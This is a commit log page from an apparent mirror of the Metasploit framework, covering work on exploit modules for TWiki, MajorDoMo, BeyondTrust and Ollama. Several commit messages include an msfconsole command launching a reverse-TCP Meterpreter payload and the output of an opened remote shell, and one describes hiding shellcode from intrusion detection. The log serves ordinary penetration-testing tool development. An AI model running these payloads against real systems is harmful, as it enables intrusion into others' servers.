adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
80,279 Commits 27 Branches 1,043 Tags
3f2a07bdcaddfac2ddf05c31400a749c2e88404c
Commit Graph

20636 Commits

Author SHA1 Message Date
adfoster-r7 9df6879a95 Update modules to use srvhost method 2026-03-03 09:37:25 -05:00
Spencer McIntyre 758ac7f2f6 Apply rubocop changes 2026-03-03 09:34:49 -05:00
Spencer McIntyre fc49421939 Replace checks for nonroutable addresses 
This consolidates modules that check for a nonroutable SRVHOST value and
replaces it with OptAddressRoutable, defaulting to a reasonable address.
 2026-03-03 09:34:49 -05:00
Spencer McIntyre a0fb02bd45 Default the address in the SMB share mixin 2026-03-03 09:34:49 -05:00
Spencer McIntyre 92e77de800 Update to use OptAddressRourtable for SRVHOST 2026-03-03 09:34:48 -05:00
Brendan 9ea5a54fe9 Merge pull request #20940 from g0tmi1k/twiki_search 
twiki_search: Fix exploit, more verbose, error handling, add fetch payload support
 2026-03-02 17:55:50 -06:00
Brendan 9664ab5191 Merge pull request #20946 from g0tmi1k/twiki_history 
twiki_history: Add revision+page options & Fetch payload support
 2026-03-02 13:58:44 -06:00
adfoster-r7 7545328be1 Linting 2026-03-02 15:02:56 +00:00
adfoster-r7 1a4ae7bfa3 Fix broken module url references 2026-03-02 14:35:48 +00:00
Diego Ledda 6f84c83135 Merge pull request #21000 from Chocapikk/add-modules-majordomo-rce 
Add three MajorDoMo unauthenticated RCE modules
 2026-03-02 05:20:22 -05:00
Valentin Lobstein 615ca34e29 Fix: Remove explicit timeouts from send_request_cgi calls 2026-02-27 14:42:00 +01:00
Valentin Lobstein 6923badeac Fix: Use background thread for cycle.php bootstrap instead of timeout 2026-02-27 14:34:24 +01:00
Valentin Lobstein 76d103e483 Fix: Bootstrap cycle tables and update lab documentation 
Add cycle.php bootstrap request in cmd_injection module to create
missing MEMORY tables before starting the cycle_execs.php worker.
Update all three module docs with curl in Dockerfile, Docker gateway
instructions, Options sections, and verified scenario outputs.
 2026-02-27 14:33:04 +01:00
g0t mi1k 218c8df3bd twiki_search: Drop MeterpreterTryToFork & fail_with 2026-02-26 09:35:50 +00:00
g0t mi1k fd1d10ec28 twiki_history: Drop MeterpreterTryToFork & fail_with 2026-02-26 09:27:53 +00:00
g0t mi1k 801bc77ec8 twiki_search: Add Linux fetch payload support 
Fetch over CmdStager

- - -

Without MeterpreterTryToFork:
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:49864) at 2026-02-19 17:22:57 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_search) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 4935 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 2026-02-26 07:12:47 +00:00
g0t mi1k 529b53ecc4 twiki_search: Add send_request() function 
This is based on MR feedback
 2026-02-26 07:12:47 +00:00
g0t mi1k 188832d68f twiki_search: Var consistencies 
Sorry, not sorry
 2026-02-26 07:12:47 +00:00
g0t mi1k 1d40b352a5 twiki_search: Consistency with exploit & check 
Payload & formatting was slightly different
 2026-02-26 07:12:47 +00:00
g0t mi1k 0395a27358 twiki_search: Improve error handing 2026-02-26 07:12:47 +00:00
g0t mi1k 71845d44a1 twiki_search: Be more verbose 2026-02-26 07:12:47 +00:00
g0t mi1k 627c1272da twiki_search: Add versions to description 
REF: https://web.archive.org/web/20221006175642/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
 2026-02-26 07:12:47 +00:00
g0t mi1k c7ffa09f01 twiki_search: Add SEARCH_PATH & switch default 
/search/Main/SearchResult - https://www.exploit-db.com/exploits/642   *Works for me*

/view/Main/WebSearch      - https://github.com/rapid7/metasploit-framework/commit/6414821ea860c6f33d9129d9af0e9648be5972a9   *Fails for me*
 2026-02-26 07:12:47 +00:00
g0t mi1k 6c804749f2 twiki_search: Switch from > to |tee 
Otherwise:
> sh: gt: command not found
 2026-02-26 07:12:47 +00:00
g0t mi1k 0b1687b5d5 twiki_history: Add Linux fetch payload support 
Fetch over CmdStager

- - -

Without MeterpreterTryToFork:
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/webapp/twiki_history; set payload cmd/linux/http/x86/meterpreter/reverse_tcp; run'
[...]
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:40453) at 2026-02-19 19:30:07 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_history) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 5042 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 2026-02-26 07:12:43 +00:00
g0t mi1k a22698205e twiki_history: Add send_request() function 
This is based on MR feedback
 2026-02-26 07:12:43 +00:00
g0t mi1k b393381296 twiki_history: Var consistencies 
Sorry, not sorry
 2026-02-26 07:12:42 +00:00
g0t mi1k 3adcfb8825 twiki_history: Improve error handing 2026-02-26 07:12:42 +00:00
g0t mi1k 4530fb3d13 twiki_history: Be more verbose 2026-02-26 07:12:42 +00:00
g0t mi1k 97668a0f0f twiki_history: Add TWIKI_PAGE 
It can be any twiki page
 2026-02-26 07:12:42 +00:00
g0t mi1k cffe0804ab twiki_history: Consistency with exploit & check 2026-02-26 07:12:42 +00:00
g0t mi1k 6177ba25fa twiki_history: Add versions to description 
REF: https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
 2026-02-26 07:12:42 +00:00
g0t mi1k bad9f29265 twiki_history: Add TWIKI_REVISION 
Cannot leave it to chance, otherwise you may get HTTP 404
 2026-02-26 07:12:42 +00:00
msutovsky-r7 ccce3a7dca Land #20951, moves default payload into more consistent default options 
Moves default payload into default options in Remote for Mac module
 2026-02-25 17:06:30 +01:00
msutovsky-r7 fae76b2961 Land #20978, adds module BeyondTrust unauth command injection (CVE-2026-1731) 
Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/R…
 2026-02-25 14:18:59 +01:00
Martin Sutovsky 0c12becfcf Separates modules 2026-02-25 13:56:13 +01:00
Martin Sutovsky 63c7bd4958 Temp rollback 2026-02-25 13:54:20 +01:00
msutovsky-r7 7dcc036b6d Land #21006, adds module for Ollama path traversal RCE (CVE-2024-37032) 
Add Ollama path traversal RCE module (CVE-2024-37032)
 2026-02-25 13:06:09 +01:00
msutovsky-r7 c5303e2ac1 Apply suggestion from @msutovsky-r7 2026-02-25 12:54:17 +01:00
msutovsky-r7 002daf8d7d Merge branch 'beyondtrust-rce-2026' into collab/exploit/beyondtrust/cve-2026-1731 2026-02-25 12:53:37 +01:00
Jonah Burgess e77b1c00c6 Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/RS RCE 2026-02-25 10:12:23 +01:00
Valentin Lobstein fd92207119 Fix BeyondTrust exploit failing on older instances (22.x) 
The /get_mech_list?version=3 endpoint returns HTTP 500 on older
BeyondTrust versions that do not support the JSON API. Add a
fallback to version=2 which returns semicolon-separated key=value
pairs (e.g. "company=sewtest;product=ingredi").

Also remove the "Thank you for using BeyondTrust" check in the
BRDF validation, as PRA instances do not contain this string,
causing the check method to incorrectly report Unknown for PRA
targets.
 2026-02-25 10:12:21 +01:00
Jonah Burgess 4f2eafda09 Changed error wording to remove patch specifics and loosen wording to 'may indicate' as there could be other reasons for the websocket exiting unexpectedly, e.g. using the cmd/unix/generic payload results in the error, even when target is vulnerable and the exploit succeeds 2026-02-25 10:11:18 +01:00
Jonah Burgess 0b78ab319e improved version checking (i think) 2026-02-25 10:11:18 +01:00
Jonah Burgess b43b204060 Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/RS RCE 2026-02-25 10:11:15 +01:00
Valentin Lobstein 70dd190bc7 Fix: Inline shellcode via asm db instead of mmap RWX 
Use Metasm's asm("db ...") to embed shellcode directly in .text section
which is executable by default. Removes mmap/memcpy/mprotect entirely,
avoiding RWX or W^X allocations that IDS may flag.

Parent process uses _exit(0) instead of return since the inlined
shellcode bytes follow the setsid() call in the instruction stream.

Co-Authored-By: jvoisin <325724+jvoisin@users.noreply.github.com>
 2026-02-24 23:32:05 +01:00
Valentin Lobstein d6d9180b7c Fix: Clarify why fork+setsid is in the constructor 
PrependFork operates at shellcode level, but fork must happen in the
.so constructor so the runner process returns immediately and is not
blocked by the payload execution.

Co-Authored-By: jvoisin <325724+jvoisin@users.noreply.github.com>
 2026-02-24 23:29:25 +01:00
Valentin Lobstein 4031d7d950 Fix: Randomize chat trigger message content 
Co-Authored-By: jvoisin <325724+jvoisin@users.noreply.github.com>
 2026-02-24 23:29:13 +01:00
Valentin Lobstein 29a02274cf Refactor: Remove redundant Platform/Arch from single target 2026-02-24 17:54:28 +01:00
Valentin Lobstein 5aeff61b26 Fix: Address PR review feedback for Ollama RCE module 
Co-Authored-By: msutovsky-r7 <190406428+msutovsky-r7@users.noreply.github.com>
 2026-02-24 17:51:23 +01:00